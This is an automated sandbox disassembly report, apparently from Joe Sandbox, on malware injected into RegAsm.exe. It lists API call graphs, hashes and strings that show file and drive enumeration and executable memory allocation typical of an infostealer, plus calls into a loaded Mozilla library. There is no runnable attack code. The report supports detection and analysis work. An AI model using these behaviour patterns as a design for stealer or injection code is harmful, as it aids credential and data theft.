                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFileH_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3244726999-0
                                                                                    • Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
                                                                                    • Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                                    • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2625060131-0
                                                                                    • Opcode ID: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                    • Instruction ID: c334b669d827ce9460b6e052bb784494c4e07a697f8de2f8e66076f210601346
                                                                                    • Opcode Fuzzy Hash: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                    • Instruction Fuzzy Hash: 63915F71D0024CEACF11EBE5D952BDEBBB8AF14308F10417EE44573282DA78570C8B66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040A898
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                                    • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                                    • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415A3F
                                                                                      • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                                      • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                      • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                                      • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                      • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                    • String ID:
                                                                                    • API String ID: 373919974-0
                                                                                    • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                                    • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3494564517-0
                                                                                    • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                                    • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0
                                                                                    APIs
                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC46CCC
                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D11
                                                                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC46D26
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CC46D35
                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D53
                                                                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CC46D73
                                                                                    • free.MOZGLUE(00000000), ref: 6CC46D80
                                                                                    • CertGetNameStringW.CRYPT32 ref: 6CC46DC0
                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46DDC
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46DEB
                                                                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CC46DFF
                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CC46E10
                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 6CC46E27
                                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CC46E34
                                                                                    • CreateFileW.KERNEL32 ref: 6CC46EF9
                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46F7D
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46F8C
                                                                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CC4709D
                                                                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC47103
                                                                                    • free.MOZGLUE(00000000), ref: 6CC47153
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC47176
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC47209
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4723A
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4726B
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4729C
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC472DC
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4730D
                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC473C2
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC473F3
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC473FF
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC47406
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC4740D
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC4741A
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6CC4755A
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC47568
                                                                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CC47585
                                                                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC47598
                                                                                    • free.MOZGLUE(00000000), ref: 6CC475AC
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                    • API String ID: 3256780453-3980470659
                                                                                    • Opcode ID: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                                    • Instruction ID: b2ad0393ad0a2950369a9f34186a438842b6a6ed6c24aff6d90f3e4af8f3011c
                                                                                    • Opcode Fuzzy Hash: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                                    • Instruction Fuzzy Hash: 9B52C3B5A002149FEB21DF65CC84BAA77B8FF46704F10C199E909A7640EB71AF85CF91
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                                      • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                                      • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                                      • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                                      • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                                      • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                      • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                                      • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                                      • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7F155
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F1E0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F1ED
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F212
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F229
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F231
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F248
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F2AE
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2BB
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2F8
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F350
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F35D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F381
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F398
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F3A0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F489
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F491
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F3CF
                                                                                      • Part of subcall function 6CC7F070: GetCurrentThreadId.KERNEL32 ref: 6CC7F440
                                                                                      • Part of subcall function 6CC7F070: AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F44D
                                                                                      • Part of subcall function 6CC7F070: ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F472
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F4A8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 565197838-2840072211
                                                                                    • Opcode ID: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                                    • Instruction ID: d9f5fd634b95f1a07382b130cba07e18aeef792666b300a5973f8d0c8ac5d279
                                                                                    • Opcode Fuzzy Hash: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                                    • Instruction Fuzzy Hash: FDD1383D7042148FDB109FF9D4987AAB7B8EB46328F14451AF95593F81EB705808CBBA
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CC464DF
                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CC464F2
                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CC46505
                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CC46518
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4652B
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4671C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC46724
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC4672F
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC46759
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC46764
                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CC46A80
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC46ABE
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC46AD3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AE8
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                    • API String ID: 487479824-2878602165
                                                                                    • Opcode ID: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                                    • Instruction ID: 0c5addb11b1d7d17326ea920779962a00a71723b413463e1f4d38d0b57080ddc
                                                                                    • Opcode Fuzzy Hash: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                                    • Instruction Fuzzy Hash: 28F1D470A05A199FDB20CF65CC8879AB7B4AF46318F14C299E809A7645F771AE84CF90
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415E6B
                                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                    • wsprintfA.USER32 ref: 00415EA2
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                    • StrCmpCA.SHLWAPI(?,00426894), ref: 00415ED6
                                                                                    • StrCmpCA.SHLWAPI(?,00426898), ref: 00415EF0
                                                                                    • wsprintfA.USER32 ref: 00415F14
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00412DD7: _EH_prolog.MSVCRT ref: 00412DDC
                                                                                      • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412DFD
                                                                                      • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412E0B
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E55
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                      • Part of subcall function 00412DD7: StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416043
                                                                                    • FindClose.KERNEL32(00000000), ref: 00416052
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416077
                                                                                    • lstrcat.KERNEL32(?), ref: 0041608A
                                                                                    • lstrlenA.KERNEL32(?), ref: 00416093
                                                                                    • lstrlenA.KERNEL32(?), ref: 004160A0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                    • String ID: %s\%s$%s\*
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040A986
                                                                                    • wsprintfA.USER32 ref: 0040A9AF
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                    • StrCmpCA.SHLWAPI(?,00425E8C), ref: 0040A9E3
                                                                                    • StrCmpCA.SHLWAPI(?,00425E90), ref: 0040A9FD
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • lstrlenA.KERNEL32(00000000,00425BD2,00000000,?,?,?,00425E94,?,?,00425BCF), ref: 0040AAAD
